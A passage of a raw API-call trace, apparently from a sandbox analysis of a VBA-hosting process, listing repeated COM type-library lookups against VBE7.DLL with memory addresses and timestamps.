(This=0x665ba50) returned 0xd [0069.545] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.545] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.545] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.545] IMalloc:Realloc (This=0x7fefec05380, pv=0xafbaf80, cb=0x2c10) returned 0xaf1b5b0 [0069.545] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.545] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.545] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.545] IUnknown:Release (This=0x665ba50) returned 0xd [0069.545] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.545] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.545] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.545] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.545] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.545] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.545] IUnknown:Release (This=0x665ba50) returned 0xd [0069.546] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.546] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.546] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.546] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.546] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.546] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.546] IUnknown:Release (This=0x665ba50) returned 0xd [0069.546] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.546] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.546] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.546] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.546] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.546] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.546] IUnknown:Release (This=0x665ba50) returned 0xd [0069.546] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.546] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.546] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.546] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.547] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.547] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.547] IUnknown:Release (This=0x665ba50) returned 0xd [0069.547] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.547] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.547] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.547] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.547] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.547] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.547] IUnknown:Release (This=0x665ba50) returned 0xd [0069.547] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.547] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.547] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.547] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.547] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.547] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.547] IUnknown:Release (This=0x665ba50) returned 0xd [0069.547] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.548] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.548] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.548] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.548] IUnknown:Release (This=0x665ba50) returned 0xd [0069.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.548] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.548] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.548] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.548] IUnknown:Release (This=0x665ba50) returned 0xd [0069.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.548] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.548] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.548] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.548] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.549] IUnknown:Release (This=0x665ba50) returned 0xd [0069.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.549] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.549] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.549] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.549] IUnknown:Release (This=0x665ba50) returned 0xd [0069.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.549] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf1b5b0, cb=0x3010) returned 0xaf1b5b0 [0069.549] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.549] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.549] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.549] IUnknown:Release (This=0x665ba50) returned 0xd [0069.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.549] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.549] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.550] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.550] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.550] IUnknown:Release (This=0x665ba50) returned 0xd [0069.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.550] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.550] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.550] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.550] IUnknown:Release (This=0x665ba50) returned 0xd [0069.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.550] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.550] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.550] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.550] IUnknown:Release (This=0x665ba50) returned 0xd [0069.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.550] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.551] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.551] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.551] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.551] IUnknown:Release (This=0x665ba50) returned 0xd [0069.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, 